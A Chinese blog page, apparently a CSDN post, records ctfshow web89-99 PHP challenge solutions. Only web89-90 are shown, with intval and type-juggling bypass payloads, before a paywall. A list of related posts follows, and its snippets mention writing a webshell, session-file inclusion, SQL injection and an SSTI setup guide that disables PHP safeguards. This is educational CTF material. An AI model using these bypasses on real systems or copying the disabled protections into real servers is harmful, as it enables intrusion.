ctfshow刷题记录web89-99

最新推荐文章于 2025-08-26 22:01:51 发布
原创 最新推荐文章于 2025-08-26 22:01:51 发布 · 456 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

一系列PHP代码示例展示了不同类型的漏洞,如整数溢出、类型转换和文件包含等,并提供了相应的payload来演示如何利用这些漏洞。同时,代码也揭示了如何通过校验和过滤来防止攻击,强调了安全编码的重要性。

web89

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 15:38:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


include("flag.php");
highlight_file(__FILE__);

if(isset($_GET['num'])){
    $num = $_GET['num'];
    if(preg_match("/[0-9]/", $num)){
        die("no no no!");
    }
    if(intval($num)){
        echo $flag;
    }
}

paylaod:?num[]=1

web90

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:06:11
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }else{
        echo intval($num,0);
    }
}

payload:?num=4476a

web91

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Firebasky
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-18 16:16:09
# @link: https://ctfer.com

*/

show_source(__FI

最低0.47元/天 解锁文章
段嘉喻
关注
CTFshow php特性 web99
Kradress的博客
12-14 804
源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-18 22:36:12 # @link: https://ctfer.com */ highlight_file(__FILE__); $allow = array(); //$allow
ctfshow web入门题记-信息收集
m0_55754984的博客
10-12 1507
右键查看源代码 JS前台拦截--无效访问 view-source f12查看请求头和响应头 可以查看robots.txt 可以查看index.phps文件 phps文件就是php的源代码文件,通常用于提供给用户(访问者)查看php代码,因为用户无法直接通过Web浏览器看到php文件的内容,所以需要用phps文件代替。 www.zip/rar/tar.gz源码泄露 readme.md Git源码泄露,使用.git/查询 开发人员会使用 git 进行版本控制,对站点自动部署。但如果配置不当.
ctfshow web入门99
m0_73303597的博客
01-11 803
自用
CTF.SHOW web入门-web99 wp
wei_xiao_zan的博客
05-22 698
ctf.show web入门wp
ctfshow-web入门-php特性(web96-web99
Welcome To Myon'Blog !
07-13 1872
如果 $_GET 不为空,也就是说我们进行了 get 传参,那么就会通过 $_GET = &$_POST 将 $_POST 的引用赋值给 $_GET,引用赋值导致两个变量指向同一个内存地址,而 $_POST 变量内容改变会影响 $_GET 变量的内容;$_GET 变量是一个数组,预定义的 $_GET 变量用于收集来自 method="get" 的表单中的值,表单域的名称会自动成为 $_GET 数组中的键。isset()函数用于检查变量是否设置,如果设置了,则 id=$_GET['id'],否则 id=1。
ctfshow学习记-web入门(php特性99-108)
龟速更新的九某人
07-18 1457
ctfshow学习记-web入门(php特性web99-108)
文件包含(CTFshow 题记)持续更新
2401_84893440的博客
04-13 2662
Session控制:通过PHPSESSID​指定文件名,注入恶意代码。竞争窗口:在PHP删除前包含文件,需毫秒级并发请求。绕过过滤:直接路径包含,避免使用被过滤字符。
ctfshow题(2)
最新发布
2402_87449821的博客
08-26 859
爆破什么的,都是基操。
ctfshow MISC题记2
rev1ve的博客
05-25 485
ctfshow misc50 misc30
ctfshow web 9 md5
m0_46412682的博客
07-14 897
ctfshow web 9 md5 一开始的页面 随便输入一个密码,没反应知识把用户名和密码清空 老规矩,用burpsuit抓包 先用个万能密码, ’ or 1=1# 没反应看来有过滤 测试了很多次还是不行,所以我网上找了,说直接输入密码:ffifdyop 就可以得到flag 看下大佬们的解释 https://blog.youkuaiyun.com/weixin_45940434/article/details/104351695?utm_medium=distribute.pc_relevant.none-task-
[ctfshow web入门]web99 in_array的弱比较漏洞
qq_50332504的博客
07-27 253
本文通过分析PHP中in_array函数的弱比较漏洞,演示了一个文件上传绕过案例。作者构造随机数组后,利用未设置type参数的in_array函数进行字符串到整数的强制类型转换。通过提交?n=1.php使'1.php'被转为1,成功绕过检查并写入webshell文件。最后通过访问1.php执行系统命令获取flag。该案例揭示了类型转换在安全防护中的重要性,提醒开发者应严格设置比较类型参数。
CTFSHOW|pwn-数学99-wp
l2645470582_的博客
11-08 1130
1.检查保护机制 2.我们用64位的IDA打开该文件 查找关键字符串看到有“cat flag” 3.我们先预览一遍程序 main函数 我们看到要if语句里面的三个函数条件为真 第一个函数 第二个函数 第三个函数 在第三个函数里面条件为真就可以拿到flag(handler) 4.第一个函数:sub_9C0() 条件: 因为输入变量s是有符号数的int型:0~2147483647 -2147483648~-1 所以8 --...
ctfshow-web入门-php特性(web89-web95)intval 函数绕过
Welcome To Myon'Blog !
07-12 1565
如果第一次匹配成功,再次使用正则表达式匹配 $a 是否等于字符串“php”,但这次只有不区分大小写,是单行模式,不会匹配多行,如果第二次没有匹配成功就会输出 flag。也就是说,如果 num 中不包含数字 "0" 就会终止程序,但是还有一种情况,如果这个 0 出现在开头,虽然是找到了有 0 这个字符,但是返回位置为 0 ,if (!== 是相等运算符,在进行比较时,会先将字符串类型转化成相同,再比较,比如比较一个数字和字符串或者比较涉及到数字内容的字符串,字符串会被转换成数值并按照数值来进行比较。
ctfshow web入门 php特性web98-102
m0_62207170的博客
06-24 1069
ctfshow web入门 php特性web98-102
ctfshow we89-101
akxnxbshai的博客
01-18 559
Web 89 Web 90 Web 91 Web 92 Web 93 web 94 Web 95 Web 96 Web 97 Web 98 Web 99 Web 100 Web 101 Web 89 明显需要绕过preg_match() 利用数组绕过: Payload:?num[]=a Web 90 因为intval() 函数返回integer值,所以加小数即可绕过if判断且intval()运算后还为4476 Payload:?num=4
CTFshow-PHP特性89-90
weixin_51706044的博客
09-29 934
web89 if(isset($_GET['num'])){<br /> $num = $_GET['num'];<br /> if(preg_match("/[0-9]/", $num)){ //正则匹配参数不能为0-9<br /> die("no no no!");<br /> }<br /> if(intval($num)){ //返回num参数的值是,整数型<br /> echo $flag;<br /> }&lt.
ctfshow web入门php特性 web89-93
m0_62207170的博客
04-18 158
ctfshow web入门php特性 web89-93
正则表达式题目(ctf题)
weixin_60777183的博客
08-30 1387
题目: <?php $key='flag{********************************}'; $Regular=preg_match("/zkaq.*key.{2,9}:\/.*\/(key*key)/i",trim($_GET["id"]),$match); if($Regular){ die('key:'.$key); } 解答: key里面有想要的Flag,要得到key需要$Regular大于0,$Regular变量中用了”preg_...
nssctf
weixin_63231007的博客
04-30 1248
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
CTFshow-WEB入门-SSTI本地部署
03-31
<think>嗯,用户想了解如何本地部署CTFshowWEB入门SSTI题目。首先,我需要回忆一下SSTI(服务器端模板注入)的基本概念,以及CTFshow这类题目的常见设置。可能用户需要搭建一个本地环境,比如使用PHP的Twig或者Python的Flask/Jinja2,具体要看题目用的是哪种模板引擎。 接下来,我需要考虑用户可能使用的技术栈。常见的本地部署可能会用到Docker、XAMPP或者直接配置Apache/Nginx。假设题目是基于PHP的,比如使用Twig模板引擎,那么需要配置PHP环境,并确保模板文件正确解析。记得用户提到的引用[1]提到IIS 6.0下.php后缀的文件会被解析,但这里可能需要Apache或Nginx的配置。例如,在Apache中,确保.htaccess正确设置,或者配置虚拟主机。 然后,用户可能需要修改题目中的一些配置,比如路由设置或者服务端代码。引用[2]提到servlet-class和url-pattern,这涉及到Java Web应用的配置,但如果题目是PHP或Python的,可能需要不同的配置方法。比如在Flask中,路由是通过装饰器定义的,而在PHP中可能需要修改.htaccess文件或服务器配置。 另外,安全设置也是需要考虑的,比如禁用危险函数,或者设置合适的权限,防止本地环境被恶意利用。用户可能还需要安装相关的依赖库,比如Composer安装Twig,或者pip安装Flask。 可能遇到的问题包括:服务器配置错误导致模板不解析,依赖未安装,路由设置不正确导致无法访问题目页面。需要逐步检查环境配置,确保每一步都正确。比如,检查PHP版本是否兼容,模板引擎是否正确加载,以及文件权限是否正确。 最后,生成相关问题时要考虑用户可能进一步的需求,比如如何调试SSTI漏洞,或者如何搭建其他类型的CTF题目环境,以及安全注意事项。需要确保回答清晰,步骤详细,并引用相关的参考资料来增强可信度。</think>### CTFshow WEB入门SSTI题目本地部署教程 #### 一、环境准备 1. **Web服务器选择**:推荐使用Apache或Nginx,需支持PHP/Python解析(根据题目具体语言) - 若使用PHP环境,建议安装PHP 7.x + Apache组合[^1] - 示例Apache配置: ```apache <VirtualHost *:80> DocumentRoot "/var/www/ssti" <Directory "/var/www/ssti"> Options Indexes FollowSymLinks AllowOverride All Require all granted </Directory> </VirtualHost> ``` 2. **模板引擎安装**: - 对于PHP Twig模板: ```bash composer require twig/twig ``` - 对于Python Flask/Jinja2: ```bash pip install flask ``` #### 二、题目部署步骤 1. **代码结构调整**: ```text 项目目/ ├── templates/ │ └── index.html ├── index.php # 或app.py └── vendor/ # PHP依赖目 ``` 2. **核心路由配置**(以PHP为例): ```php <?php require_once 'vendor/autoload.php'; $loader = new \Twig\Loader\FilesystemLoader('templates'); $twig = new \Twig\Environment($loader); $template = $twig->load('index.html'); echo $template->render($_GET); ``` 3. **安全限制解除**(调试需要): -php.ini中设置: ```ini disable_functions = allow_url_include = On ``` #### 三、访问验证 1. 启动Apache服务: ```bash sudo systemctl start apache2 ``` 2. 访问测试: ```bash curl http://localhost/?payload={{7*7}} # 应返回计算结果49 ``` #### 四、常见问题排查 1. **模板不解析**: - 检查文件权限:`chmod -R 755 templates/` - 验证Twig初始化是否正确 - 查看Apache错误日志:`tail -f /var/log/apache2/error.log` 2. **依赖缺失**: - PHP需安装mbstring扩展 - Python需安装Jinja2最新版
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值